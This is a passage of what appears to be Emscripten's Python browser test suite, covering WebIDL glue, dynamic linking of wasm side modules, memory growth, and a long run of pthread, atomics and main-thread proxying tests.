path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._run_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._run_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._run_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._run_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _run_dylink_dso_needed(self, wasm, inworker):
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed the string without the trailing \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
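# For reference, the emscripten_ atomics API exercised here is the C API from
# emscripten/threading.h; a minimal hedged sketch of the kind of calls involved (the test
# file itself is authoritative):
#
#   #include <emscripten/threading.h>
#   uint32_t shared = 0;
#   emscripten_atomic_store_u32(&shared, 1);
#   emscripten_atomic_cas_u32(&shared, 1, 2);                 // compare-and-swap
#   uint32_t now = emscripten_atomic_load_u32(&shared);       // now == 2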
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the remaining GCC atomics not covered by the tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME=1'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the chrome renderer and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), while the main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless we test whether that
# kind of scheme works with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Previously failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), there is no deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
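# A hedged sketch of the kind of proxying call being tested (names are from
# emscripten/threading.h; the exact usage in test_pthread_run_on_main_thread.cpp may differ):
#
#   #include <emscripten/threading.h>
#   static void do_work(int arg) { /* runs on the main browser thread */ }
#   // From a pthread, block until do_work(42) has executed on the main thread:
#   emscripten_sync_run_in_main_runtime_thread(EM_FUNC_SIG_VI, do_work, 42);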
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
